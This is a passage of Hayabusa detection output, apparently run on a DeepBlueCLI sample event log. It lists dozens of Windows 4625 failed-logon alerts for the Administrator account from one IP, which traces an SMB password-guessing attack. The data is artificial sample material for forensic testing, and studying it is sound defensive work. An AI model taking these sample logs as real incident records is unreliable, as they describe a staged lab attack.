01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.497 